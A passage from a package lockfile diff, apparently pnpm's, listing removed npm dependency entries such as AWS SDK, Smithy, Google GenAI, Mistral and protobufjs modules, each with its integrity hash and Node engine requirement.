'@aws-sdk/credential-provider-process@3.972.18': - resolution: {integrity: sha512-Tpl7SRaPoOLT32jbTWchPsn52hYYgJ0kpiFgnwk8pxTANQdUymVSZkzFvv1+oOgZm1CrbQUP9MBeoMZ9IzLZjA==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/credential-provider-sso@3.972.20': - resolution: {integrity: sha512-p+R+PYR5Z7Gjqf/6pvbCnzEHcqPCpLzR7Yf127HjJ6EAb4hUcD+qsNRnuww1sB/RmSeCLxyay8FMyqREw4p1RA==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/credential-provider-web-identity@3.972.20': - resolution: {integrity: sha512-rWCmh8o7QY4CsUj63qopzMzkDq/yPpkrpb+CnjBEFSOg/02T/we7sSTVg4QsDiVS9uwZ8VyONhq98qt+pIh3KA==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/eventstream-handler-node@3.972.11': - resolution: {integrity: sha512-2IrLrOruRr1NhTK0vguBL1gCWv1pu4bf4KaqpsA+/vCJpFEbvXFawn71GvCzk1wyjnDUsemtKypqoKGv4cSGbA==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/middleware-eventstream@3.972.8': - resolution: {integrity: sha512-r+oP+tbCxgqXVC3pu3MUVePgSY0ILMjA+aEwOosS77m3/DRbtvHrHwqvMcw+cjANMeGzJ+i0ar+n77KXpRA8RQ==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/middleware-host-header@3.972.8': - resolution: {integrity: sha512-wAr2REfKsqoKQ+OkNqvOShnBoh+nkPurDKW7uAeVSu6kUECnWlSJiPvnoqxGlfousEY/v9LfS9sNc46hjSYDIQ==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/middleware-logger@3.972.8': - resolution: {integrity: sha512-CWl5UCM57WUFaFi5kB7IBY1UmOeLvNZAZ2/OZ5l20ldiJ3TiIz1pC65gYj8X0BCPWkeR1E32mpsCk1L1I4n+lA==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/middleware-recursion-detection@3.972.8': - resolution: {integrity: sha512-BnnvYs2ZEpdlmZ2PNlV2ZyQ8j8AEkMTjN79y/YA475ER1ByFYrkVR85qmhni8oeTaJcDqbx364wDpitDAA/wCA==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/middleware-user-agent@3.972.21': - resolution: {integrity: sha512-62XRl1GDYPpkt7cx1AX1SPy9wgNE9Iw/NPuurJu4lmhCWS7sGKO+kS53TQ8eRmIxy3skmvNInnk0ZbWrU5Dpyg==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/middleware-websocket@3.972.13': - resolution: {integrity: sha512-Gp6EWIqHX5wmsOR5ZxWyyzEU8P0xBdSxkm6VHEwXwBqScKZ7QWRoj6ZmHpr+S44EYb5tuzGya4ottsogSu2W3A==} - engines: {node: '>= 14.0.0'} - - '@aws-sdk/nested-clients@3.996.10': - resolution: {integrity: sha512-SlDol5Z+C7Ivnc2rKGqiqfSUmUZzY1qHfVs9myt/nxVwswgfpjdKahyTzLTx802Zfq0NFRs7AejwKzzzl5Co2w==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/region-config-resolver@3.972.8': - resolution: {integrity: sha512-1eD4uhTDeambO/PNIDVG19A6+v4NdD7xzwLHDutHsUqz0B+i661MwQB2eYO4/crcCvCiQG4SRm1k81k54FEIvw==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/token-providers@3.1009.0': - resolution: {integrity: sha512-KCPLuTqN9u0Rr38Arln78fRG9KXpzsPWmof+PZzfAHMMQq2QED6YjQrkrfiH7PDefLWEposY1o4/eGwrmKA4JA==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/types@3.973.6': - resolution: {integrity: sha512-Atfcy4E++beKtwJHiDln2Nby8W/mam64opFPTiHEqgsthqeydFS1pY+OUlN1ouNOmf8ArPU/6cDS65anOP3KQw==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/util-endpoints@3.996.5': - resolution: {integrity: sha512-Uh93L5sXFNbyR5sEPMzUU8tJ++Ku97EY4udmC01nB8Zu+xfBPwpIwJ6F7snqQeq8h2pf+8SGN5/NoytfKgYPIw==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/util-format-url@3.972.8': - resolution: {integrity: sha512-J6DS9oocrgxM8xlUTTmQOuwRF6rnAGEujAN9SAzllcrQmwn5iJ58ogxy3SEhD0Q7JZvlA5jvIXBkpQRqEqlE9A==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/util-locate-window@3.965.5': - resolution: {integrity: sha512-WhlJNNINQB+9qtLtZJcpQdgZw3SCDCpXdUJP7cToGwHbCWCnRckGlc6Bx/OhWwIYFNAn+FIydY8SZ0QmVu3xTQ==} - engines: {node: '>=20.0.0'} - - '@aws-sdk/util-user-agent-browser@3.972.8': - resolution: {integrity: sha512-B3KGXJviV2u6Cdw2SDY2aDhoJkVfY/Q/Trwk2CMSkikE1Oi6gRzxhvhIfiRpHfmIsAhV4EA54TVEX8K6CbHbkA==} - - '@aws-sdk/util-user-agent-node@3.973.7': - resolution: {integrity: sha512-Hz6EZMUAEzqUd7e+vZ9LE7mn+5gMbxltXy18v+YSFY+9LBJz15wkNZvw5JqfX3z0FS9n3bgUtz3L5rAsfh4YlA==} - engines: {node: '>=20.0.0'} - peerDependencies: - aws-crt: '>=1.0.0' - peerDependenciesMeta: - aws-crt: - optional: true - - '@aws-sdk/xml-builder@3.972.11': - resolution: {integrity: sha512-iitV/gZKQMvY9d7ovmyFnFuTHbBAtrmLnvaSb/3X8vOKyevwtpmEtyc8AdhVWZe0pI/1GsHxlEvQeOePFzy7KQ==} - engines: {node: '>=20.0.0'} - - '@aws/lambda-invoke-store@0.2.4': - resolution: {integrity: sha512-iY8yvjE0y651BixKNPgmv1WrQc+GZ142sb0z4gYnChDDY2YqI4P/jsSopBWrKfAt7LOJAkOXt7rC/hms+WclQQ==} - engines: {node: '>=18.0.0'} - - '@babel/runtime@7.28.6': - resolution: {integrity: sha512-05WQkdpL9COIMz4LjTxGpPNCdlpyimKppYNoJ5Di5EUObifl8t4tuLuUBBZEpoLYOmfvIWrsp9fCl0HoPRVTdA==} - engines: {node: '>=6.9.0'} - - '@google/genai@1.45.0': - resolution: {integrity: sha512-+sNRWhKiRibVgc4OKi7aBJJ0A7RcoVD8tGG+eFkqxAWRjASDW+ktS9lLwTDnAxZICzCVoeAdu8dYLJVTX60N9w==} - engines: {node: '>=20.0.0'} - peerDependencies: - '@modelcontextprotocol/sdk': ^1.25.2 - peerDependenciesMeta: - '@modelcontextprotocol/sdk': - optional: true - - '@isaacs/cliui@8.0.2': - resolution: {integrity: sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==} - engines: {node: '>=12'} - - '@mistralai/mistralai@1.14.1': - resolution: {integrity: sha512-IiLmmZFCCTReQgPAT33r7KQ1nYo5JPdvGkrkZqA8qQ2qB1GHgs5LoP5K2ICyrjnpw2n8oSxMM/VP+liiKcGNlQ==} - - '@pkgjs/parseargs@0.11.0': - resolution: {integrity: sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==} - engines: {node: '>=14'} - - '@protobufjs/aspromise@1.1.2': - resolution: {integrity: sha512-j+gKExEuLmKwvz3OgROXtrJ2UG2x8Ch2YZUxahh+s1F2HZ+wAceUNLkvy6zKCPVRkU++ZWQrdxsUeQXmcg4uoQ==} - - '@protobufjs/base64@1.1.2': - resolution: {integrity: sha512-AZkcAA5vnN/v4PDqKyMR5lx7hZttPDgClv83E//FMNhR2TMcLUhfRUBHCmSl0oi9zMgDDqRUJkSxO3wm85+XLg==} - - '@protobufjs/codegen@2.0.4': - resolution: {integrity: sha512-YyFaikqM5sH0ziFZCN3xDC7zeGaB/d0IUb9CATugHWbd1FRFwWwt4ld4OYMPWu5a3Xe01mGAULCdqhMlPl29Jg==} - - '@protobufjs/eventemitter@1.1.0': - resolution: {integrity: sha512-j9ednRT81vYJ9OfVuXG6ERSTdEL1xVsNgqpkxMsbIabzSo3goCjDIveeGv5d03om39ML71RdmrGNjG5SReBP/Q==} - - '@protobufjs/fetch@1.1.0': - resolution: {integrity: sha512-lljVXpqXebpsijW71PZaCYeIcE5on1w5DlQy5WH6GLbFryLUrBD4932W/E2BSpfRJWseIL4v/KPgBFxDOIdKpQ==} - - '@protobufjs/float@1.0.2': - resolution: {integrity: sha512-Ddb+kVXlXst9d+R9PfTIxh1EdNkgoRe5tOX6t01f1lYWOvJnSPDBlG241QLzcyPdoNTsblLUdujGSE4RzrTZGQ==} - - '@protobufjs/inquire@1.1.0': - resolution: {integrity: sha512-kdSefcPdruJiFMVSbn801t4vFK7KB/5gd2fYvrxhuJYg8ILrmn9SKSX2tZdV6V+ksulWqS7aXjBcRXl3wHoD9Q==} - - '@protobufjs/path@1.1.2': - resolution: {integrity: sha512-6JOcJ5Tm08dOHAbdR3GrvP+yUUfkjG5ePsHYczMFLq3ZmMkAD98cDgcT2iA1lJ9NVwFd4tH/iSSoe44YWkltEA==} - - '@protobufjs/pool@1.1.0': - resolution: {integrity: sha512-0kELaGSIDBKvcgS4zkjz1PeddatrjYcmMWOlAuAPwAeccUrPHdUqo/J6LiymHHEiJT5NrF1UVwxY14f+fy4WQw==} - - '@protobufjs/utf8@1.1.0': - resolution: {integrity: sha512-Vvn3zZrhQZkkBE8LSuW3em98c0FwgO4nxzv6OdSxPKJIEKY2bGbHn+mhGIPerzI4twdxaP8/0+06HBpwf345Lw==} - - '@sinclair/typebox@0.34.48': - resolution: {integrity: sha512-kKJTNuK3AQOrgjjotVxMrCn1sUJwM76wMszfq1kdU4uYVJjvEWuFQ6HgvLt4Xz3fSmZlTOxJ/Ie13KnIcWQXFA==} - - '@smithy/abort-controller@4.2.12': - resolution: {integrity: sha512-xolrFw6b+2iYGl6EcOL7IJY71vvyZ0DJ3mcKtpykqPe2uscwtzDZJa1uVQXyP7w9Dd+kGwYnPbMsJrGISKiY/Q==} - engines: {node: '>=18.0.0'} - - '@smithy/config-resolver@4.4.11': - resolution: {integrity: sha512-YxFiiG4YDAtX7WMN7RuhHZLeTmRRAOyCbr+zB8e3AQzHPnUhS8zXjB1+cniPVQI3xbWsQPM0X2aaIkO/ME0ymw==} - engines: {node: '>=18.0.0'} - - '@smithy/core@3.23.12': - resolution: {integrity: sha512-o9VycsYNtgC+Dy3I0yrwCqv9CWicDnke0L7EVOrZtJpjb2t0EjaEofmMrYc0T1Kn3yk32zm6cspxF9u9Bj7e5w==} - engines: {node: '>=18.0.0'} - - '@smithy/credential-provider-imds@4.2.12': - resolution: {integrity: sha512-cr2lR792vNZcYMriSIj+Um3x9KWrjcu98kn234xA6reOAFMmbRpQMOv8KPgEmLLtx3eldU6c5wALKFqNOhugmg==} - engines: {node: '>=18.0.0'} - - '@smithy/eventstream-codec@4.2.12': - resolution: {integrity: sha512-FE3bZdEl62ojmy8x4FHqxq2+BuOHlcxiH5vaZ6aqHJr3AIZzwF5jfx8dEiU/X0a8RboyNDjmXjlbr8AdEyLgiA==} - engines: {node: '>=18.0.0'} - - '@smithy/eventstream-serde-browser@4.2.12': - resolution: {integrity: sha512-XUSuMxlTxV5pp4VpqZf6Sa3vT/Q75FVkLSpSSE3KkWBvAQWeuWt1msTv8fJfgA4/jcJhrbrbMzN1AC/hvPmm5A==} - engines: {node: '>=18.0.0'} - - '@smithy/eventstream-serde-config-resolver@4.3.12': - resolution: {integrity: sha512-7epsAZ3QvfHkngz6RXQYseyZYHlmWXSTPOfPmXkiS+zA6TBNo1awUaMFL9vxyXlGdoELmCZyZe1nQE+imbmV+Q==} - engines: {node: '>=18.0.0'} - - '@smithy/eventstream-serde-node@4.2.12': - resolution: {integrity: sha512-D1pFuExo31854eAvg89KMn9Oab/wEeJR6Buy32B49A9Ogdtx5fwZPqBHUlDzaCDpycTFk2+fSQgX689Qsk7UGA==} - engines: {node: '>=18.0.0'} - - '@smithy/eventstream-serde-universal@4.2.12': - resolution: {integrity: sha512-+yNuTiyBACxOJUTvbsNsSOfH9G9oKbaJE1lNL3YHpGcuucl6rPZMi3nrpehpVOVR2E07YqFFmtwpImtpzlouHQ==} - engines: {node: '>=18.0.0'} - - '@smithy/fetch-http-handler@5.3.15': - resolution: {integrity: sha512-T4jFU5N/yiIfrtrsb9uOQn7RdELdM/7HbyLNr6uO/mpkj1ctiVs7CihVr51w4LyQlXWDpXFn4BElf1WmQvZu/A==} - engines: {node: '>=18.0.0'} - - '@smithy/hash-node@4.2.12': - resolution: {integrity: sha512-QhBYbGrbxTkZ43QoTPrK72DoYviDeg6YKDrHTMJbbC+A0sml3kSjzFtXP7BtbyJnXojLfTQldGdUR0RGD8dA3w==} - engines: {node: '>=18.0.0'} - - '@smithy/invalid-dependency@4.2.12': - resolution: {integrity: sha512-/4F1zb7Z8LOu1PalTdESFHR0RbPwHd3FcaG1sI3UEIriQTWakysgJr65lc1jj6QY5ye7aFsisajotH6UhWfm/g==} - engines: {node: '>=18.0.0'} - - '@smithy/is-array-buffer@2.2.0': - resolution: {integrity: sha512-GGP3O9QFD24uGeAXYUjwSTXARoqpZykHadOmA8G5vfJPK0/DC67qa//0qvqrJzL1xc8WQWX7/yc7fwudjPHPhA==} - engines: {node: '>=14.0.0'} - - '@smithy/is-array-buffer@4.2.2': - resolution: {integrity: sha512-n6rQ4N8Jj4YTQO3YFrlgZuwKodf4zUFs7EJIWH86pSCWBaAtAGBFfCM7Wx6D2bBJ2xqFNxGBSrUWswT3M0VJow==} - engines: {node: '>=18.0.0'} - - '@smithy/middleware-content-length@4.2.12': - resolution: {integrity: sha512-YE58Yz+cvFInWI/wOTrB+DbvUVz/pLn5mC5MvOV4fdRUc6qGwygyngcucRQjAhiCEbmfLOXX0gntSIcgMvAjmA==} - engines: {node: '>=18.0.0'} - - '@smithy/middleware-endpoint@4.4.26': - resolution: {integrity: sha512-8Qfikvd2GVKSm8S6IbjfwFlRY9VlMrj0Dp4vTwAuhqbX7NhJKE5DQc2bnfJIcY0B+2YKMDBWfvexbSZeejDgeg==} - engines: {node: '>=18.0.0'} - - '@smithy/middleware-retry@4.4.43': - resolution: {integrity: sha512-ZwsifBdyuNHrFGmbc7bAfP2b54+kt9J2rhFd18ilQGAB+GDiP4SrawqyExbB7v455QVR7Psyhb2kjULvBPIhvA==} - engines: {node: '>=18.0.0'} - - '@smithy/middleware-serde@4.2.15': - resolution: {integrity: sha512-ExYhcltZSli0pgAKOpQQe1DLFBLryeZ22605y/YS+mQpdNWekum9Ujb/jMKfJKgjtz1AZldtwA/wCYuKJgjjlg==} - engines: {node: '>=18.0.0'} - - '@smithy/middleware-stack@4.2.12': - resolution: {integrity: sha512-kruC5gRHwsCOuyCd4ouQxYjgRAym2uDlCvQ5acuMtRrcdfg7mFBg6blaxcJ09STpt3ziEkis6bhg1uwrWU7txw==} - engines: {node: '>=18.0.0'} - - '@smithy/node-config-provider@4.3.12': - resolution: {integrity: sha512-tr2oKX2xMcO+rBOjobSwVAkV05SIfUKz8iI53rzxEmgW3GOOPOv0UioSDk+J8OpRQnpnhsO3Af6IEBabQBVmiw==} - engines: {node: '>=18.0.0'} - - '@smithy/node-http-handler@4.5.0': - resolution: {integrity: sha512-Rnq9vQWiR1+/I6NZZMNzJHV6pZYyEHt2ZnuV3MG8z2NNenC4i/8Kzttz7CjZiHSmsN5frhXhg17z3Zqjjhmz1A==} - engines: {node: '>=18.0.0'} - - '@smithy/property-provider@4.2.12': - resolution: {integrity: sha512-jqve46eYU1v7pZ5BM+fmkbq3DerkSluPr5EhvOcHxygxzD05ByDRppRwRPPpFrsFo5yDtCYLKu+kreHKVrvc7A==} - engines: {node: '>=18.0.0'} - - '@smithy/protocol-http@5.3.12': - resolution: {integrity: sha512-fit0GZK9I1xoRlR4jXmbLhoN0OdEpa96ul8M65XdmXnxXkuMxM0Y8HDT0Fh0Xb4I85MBvBClOzgSrV1X2s1Hxw==} - engines: {node: '>=18.0.0'} - - '@smithy/querystring-builder@4.2.12': - resolution: {integrity: sha512-6wTZjGABQufekycfDGMEB84BgtdOE/rCVTov+EDXQ8NHKTUNIp/j27IliwP7tjIU9LR+sSzyGBOXjeEtVgzCHg==} - engines: {node: '>=18.0.0'} - - '@smithy/querystring-parser@4.2.12': - resolution: {integrity: sha512-P2OdvrgiAKpkPNKlKUtWbNZKB1XjPxM086NeVhK+W+wI46pIKdWBe5QyXvhUm3MEcyS/rkLvY8rZzyUdmyDZBw==} - engines: {node: '>=18.0.0'} - - '@smithy/service-error-classification@4.2.12': - resolution: {integrity: sha512-LlP29oSQN0Tw0b6D0Xo6BIikBswuIiGYbRACy5ujw/JgWSzTdYj46U83ssf6Ux0GyNJVivs2uReU8pt7Eu9okQ==} - engines: {node: '>=18.0.0'} - - '@smithy/shared-ini-file-loader@4.4.7': - resolution: {integrity: sha512-HrOKWsUb+otTeo1HxVWeEb99t5ER1XrBi/xka2Wv6NVmTbuCUC1dvlrksdvxFtODLBjsC+PHK+fuy2x/7Ynyiw==} - engines: {node: '>=18.0.0'} - - '@smithy/signature-v4@5.3.12': - resolution: {integrity: sha512-B/FBwO3MVOL00DaRSXfXfa/TRXRheagt/q5A2NM13u7q+sHS59EOVGQNfG7DkmVtdQm5m3vOosoKAXSqn/OEgw==} - engines: {node: '>=18.0.0'} - - '@smithy/smithy-client@4.12.6': - resolution: {integrity: sha512-aib3f0jiMsJ6+cvDnXipBsGDL7ztknYSVqJs1FdN9P+u9tr/VzOR7iygSh6EUOdaBeMCMSh3N0VdyYsG4o91DQ==} - engines: {node: '>=18.0.0'} - - '@smithy/types@4.13.1': - resolution: {integrity: sha512-787F3yzE2UiJIQ+wYW1CVg2odHjmaWLGksnKQHUrK/lYZSEcy1msuLVvxaR/sI2/aDe9U+TBuLsXnr3vod1g0g==} - engines: {node: '>=18.0.0'} - - '@smithy/url-parser@4.2.12': - resolution: {integrity: sha512-wOPKPEpso+doCZGIlr+e1lVI6+9VAKfL4kZWFgzVgGWY2hZxshNKod4l2LXS3PRC9otH/JRSjtEHqQ/7eLciRA==} - engines: {node: '>=18.0.0'} - - '@smithy/util-base64@4.3.2': - resolution: {integrity: sha512-XRH6b0H/5A3SgblmMa5ErXQ2XKhfbQB+Fm/oyLZ2O2kCUrwgg55bU0RekmzAhuwOjA9qdN5VU2BprOvGGUkOOQ==} - engines: {node: '>=18.0.0'} - - '@smithy/util-body-length-browser@4.2.2': - resolution: {integrity: sha512-JKCrLNOup3OOgmzeaKQwi4ZCTWlYR5H4Gm1r2uTMVBXoemo1UEghk5vtMi1xSu2ymgKVGW631e2fp9/R610ZjQ==} - engines: {node: '>=18.0.0'} - - '@smithy/util-body-length-node@4.2.3': - resolution: {integrity: sha512-ZkJGvqBzMHVHE7r/hcuCxlTY8pQr1kMtdsVPs7ex4mMU+EAbcXppfo5NmyxMYi2XU49eqaz56j2gsk4dHHPG/g==} - engines: {node: '>=18.0.0'} - - '@smithy/util-buffer-from@2.2.0': - resolution: {integrity: sha512-IJdWBbTcMQ6DA0gdNhh/BwrLkDR+ADW5Kr1aZmd4k3DIF6ezMV4R2NIAmT08wQJ3yUK82thHWmC/TnK/wpMMIA==} - engines: {node: '>=14.0.0'} - - '@smithy/util-buffer-from@4.2.2': - resolution: {integrity: sha512-FDXD7cvUoFWwN6vtQfEta540Y/YBe5JneK3SoZg9bThSoOAC/eGeYEua6RkBgKjGa/sz6Y+DuBZj3+YEY21y4Q==} - engines: {node: '>=18.0.0'} - - '@smithy/util-config-provider@4.2.2': - resolution: {integrity: sha512-dWU03V3XUprJwaUIFVv4iOnS1FC9HnMHDfUrlNDSh4315v0cWyaIErP8KiqGVbf5z+JupoVpNM7ZB3jFiTejvQ==} - engines: {node: '>=18.0.0'} - - '@smithy/util-defaults-mode-browser@4.3.42': - resolution: {integrity: sha512-0vjwmcvkWAUtikXnWIUOyV6IFHTEeQUYh3JUZcDgcszF+hD/StAsQ3rCZNZEPHgI9kVNcbnyc8P2CBHnwgmcwg==} - engines: {node: '>=18.0.0'} - - '@smithy/util-defaults-mode-node@4.2.45': - resolution: {integrity: sha512-q5dOqqfTgUcLe38TAGiFn9srToKj2YCHJ34QGOLzM+xYLLA+qRZv7N+33kl1MERVusue36ZHnlNaNEvY/PzSrw==} - engines: {node: '>=18.0.0'} - - '@smithy/util-endpoints@3.3.3': - resolution: {integrity: sha512-VACQVe50j0HZPjpwWcjyT51KUQ4AnsvEaQ2lKHOSL4mNLD0G9BjEniQ+yCt1qqfKfiAHRAts26ud7hBjamrwig==} - engines: {node: '>=18.0.0'} - - '@smithy/util-hex-encoding@4.2.2': - resolution: {integrity: sha512-Qcz3W5vuHK4sLQdyT93k/rfrUwdJ8/HZ+nMUOyGdpeGA1Wxt65zYwi3oEl9kOM+RswvYq90fzkNDahPS8K0OIg==} - engines: {node: '>=18.0.0'} - - '@smithy/util-middleware@4.2.12': - resolution: {integrity: sha512-Er805uFUOvgc0l8nv0e0su0VFISoxhJ/AwOn3gL2NWNY2LUEldP5WtVcRYSQBcjg0y9NfG8JYrCJaYDpupBHJQ==} - engines: {node: '>=18.0.0'} - - '@smithy/util-retry@4.2.12': - resolution: {integrity: sha512-1zopLDUEOwumjcHdJ1mwBHddubYF8GMQvstVCLC54Y46rqoHwlIU+8ZzUeaBcD+WCJHyDGSeZ2ml9YSe9aqcoQ==} - engines: {node: '>=18.0.0'} - - '@smithy/util-stream@4.5.20': - resolution: {integrity: sha512-4yXLm5n/B5SRBR2p8cZ90Sbv4zL4NKsgxdzCzp/83cXw2KxLEumt5p+GAVyRNZgQOSrzXn9ARpO0lUe8XSlSDw==} - engines: {node: '>=18.0.0'} - - '@smithy/util-uri-escape@4.2.2': - resolution: {integrity: sha512-2kAStBlvq+lTXHyAZYfJRb/DfS3rsinLiwb+69SstC9Vb0s9vNWkRwpnj918Pfi85mzi42sOqdV72OLxWAISnw==} - engines: {node: '>=18.0.0'} - - '@smithy/util-utf8@2.3.0': - resolution: {integrity: sha512-R8Rdn8Hy72KKcebgLiv8jQcQkXoLMOGGv5uI1/k0l+snqkOzQ1R0ChUBCxWMlBsFMekWjq0wRudIweFs7sKT5A==} - engines: {node: '>=14.0.0'} - - '@smithy/util-utf8@4.2.2': - resolution: {integrity: sha512-75MeYpjdWRe8M5E3AW0O4Cx3UadweS+cwdXjwYGBW5h/gxxnbeZ877sLPX/ZJA9GVTlL/qG0dXP29JWFCD1Ayw==} - engines: {node: '>=18.0.0'} - - '@smithy/uuid@1.1.2': - resolution: {integrity: sha512-O/IEdcCUKkubz60tFbGA7ceITTAJsty+lBjNoorP4Z6XRqaFb/OjQjZODophEcuq68nKm6/0r+6/lLQ+XVpk8g==} - engines: {node: '>=18.0.0'} - - '@tootallnate/quickjs-emscripten@0.23.0': - resolution: {integrity: sha512-C5Mc6rdnsaJDjO3UpGW/CQTHtCKaYlScZTly4JIu97Jxo/odCiH0ITnDXSJPTOrEKk/ycSZ0AOgTmkDtkOsvIA==} - - '@types/node@25.5.0': - resolution: {integrity: sha512-jp2P3tQMSxWugkCUKLRPVUpGaL5MVFwF8RDuSRztfwgN1wmqJeMSbKlnEtQqU8UrhTmzEmZdu2I6v2dpp7XIxw==} - - '@types/retry@0.12.0': - resolution: {integrity: sha512-wWKOClTTiizcZhXnPY4wikVAwmdYHp8q6DmC+EJUzAMsycb7HB32Kh9RN4+0gExjmPmZSAQjgURXIGATPegAvA==} - - agent-base@7.1.4: - resolution: {integrity: sha512-MnA+YT8fwfJPgBx3m60MNqakm30XOkyIoH1y6huTQvC0PwZG7ki8NacLBcrPbNoo8vEZy7Jpuk7+jMO+CUovTQ==} - engines: {node: '>= 14'} - - ajv-formats@3.0.1: - resolution: {integrity: sha512-8iUql50EUR+uUcdRQ3HDqa6EVyo3docL8g5WJ3FNcWmu62IbkGUue/pEyLBW8VGKKucTPgqeks4fIU1DA4yowQ==} - peerDependencies: - ajv: ^8.0.0 - peerDependenciesMeta: - ajv: - optional: true - - ajv@8.18.0: - resolution: {integrity: sha512-PlXPeEWMXMZ7sPYOHqmDyCJzcfNrUr3fGNKtezX14ykXOEIvyK81d+qydx89KY5O71FKMPaQ2vBfBFI5NHR63A==} - - ansi-regex@5.0.1: - resolution: {integrity: sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==} - engines: {node: '>=8'} - - ansi-regex@6.2.2: - resolution: {integrity: sha512-Bq3SmSpyFHaWjPk8If9yc6svM8c56dB5BAtW4Qbw5jHTwwXXcTLoRMkpDJp6VL0XzlWaCHTXrkFURMYmD0sLqg==} - engines: {node: '>=12'} - - ansi-styles@4.3.0: - resolution: {integrity: sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==} - engines: {node: '>=8'} - - ansi-styles@6.2.3: - resolution: {integrity: sha512-4Dj6M28JB+oAH8kFkTLUo+a2jwOFkuqb3yucU0CANcRRUbxS0cP0nZYCGjcc3BNXwRIsUVmDGgzawme7zvJHvg==} - engines: {node: '>=12'} - - ast-types@0.13.4: - resolution: {integrity: sha512-x1FCFnFifvYDDzTaLII71vG5uvDwgtmDTEVWAxrgeiR8VjMONcCXJx7E+USjDtHlwFmt9MysbqgF9b9Vjr6w+w==} - engines: {node: '>=4'} - - balanced-match@1.0.2: - resolution: {integrity: sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==} - - base64-js@1.5.1: - resolution: {integrity: sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA==} - - basic-ftp@5.2.0: - resolution: {integrity: sha512-VoMINM2rqJwJgfdHq6RiUudKt2BV+FY5ZFezP/ypmwayk68+NzzAQy4XXLlqsGD4MCzq3DrmNFD/uUmBJuGoXw==} - engines: {node: '>=10.0.0'} - - bignumber.js@9.3.1: - resolution: {integrity: sha512-Ko0uX15oIUS7wJ3Rb30Fs6SkVbLmPBAKdlm7q9+ak9bbIeFf0MwuBsQV6z7+X768/cHsfg+WlysDWJcmthjsjQ==} - - bowser@2.14.1: - resolution: {integrity: sha512-tzPjzCxygAKWFOJP011oxFHs57HzIhOEracIgAePE4pqB3LikALKnSzUyU4MGs9/iCEUuHlAJTjTc5M+u7YEGg==} - - brace-expansion@2.0.2: - resolution: {integrity: sha512-Jt0vHyM+jmUBqojB7E1NIYadt0vI0Qxjxd2TErW94wDz+E2LAm5vKMXXwg6ZZBTHPuUlDgQHKXvjGBdfcF1ZDQ==} - - buffer-equal-constant-time@1.0.1: - resolution: {integrity: sha512-zRpUiDwd/xk6ADqPMATG8vc9VPrkck7T07OIx0gnjmJAnHnTVXNQG3vfvWNuiZIkwu9KrKdA1iJKfsfTVxE6NA==} - - chalk@5.6.2: - resolution: {integrity: sha512-7NzBL0rN6fMUW+f7A6Io4h40qQlG+xGmtMxfbnH/K7TAtt8JQWVQK+6g0UXKMeVJoyV5EkkNsErQ8pVD3bLHbA==} - engines: {node: ^12.17.0 || ^14.13 || >=16.0.0} - - color-convert@2.0.1: - resolution: {integrity: sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==} - engines: {node: '>=7.0.0'} - - color-name@1.1.4: - resolution: {integrity: sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==} - - cross-spawn@7.0.6: - resolution: {integrity: sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==} - engines: {node: '>= 8'} - - data-uri-to-buffer@4.0.1: - resolution: {integrity: sha512-0R9ikRb668HB7QDxT1vkpuUBtqc53YyAwMwGeUFKRojY/NWKvdZ+9UYtRfGmhqNbRkTSVpMbmyhXipFFv2cb/A==} - engines: {node: '>= 12'} - - data-uri-to-buffer@6.0.2: - resolution: {integrity: sha512-7hvf7/GW8e86rW0ptuwS3OcBGDjIi6SZva7hCyWC0yYry2cOPmLIjXAUHI6DK2HsnwJd9ifmt57i8eV2n4YNpw==} - engines: {node: '>= 14'} - - debug@4.4.3: - resolution: {integrity: sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==} - engines: {node: '>=6.0'} - peerDependencies: - supports-color: '*' - peerDependenciesMeta: - supports-color: - optional: true - - degenerator@5.0.1: - resolution: {integrity: sha512-TllpMR/t0M5sqCXfj85i4XaAzxmS5tVA16dqvdkMwGmzI+dXLXnw3J+3Vdv7VKw+ThlTMboK6i9rnZ6Nntj5CQ==} - engines: {node: '>= 14'} - - eastasianwidth@0.2.0: - resolution: {integrity: sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==} - - ecdsa-sig-formatter@1.0.11: - resolution: {integrity: 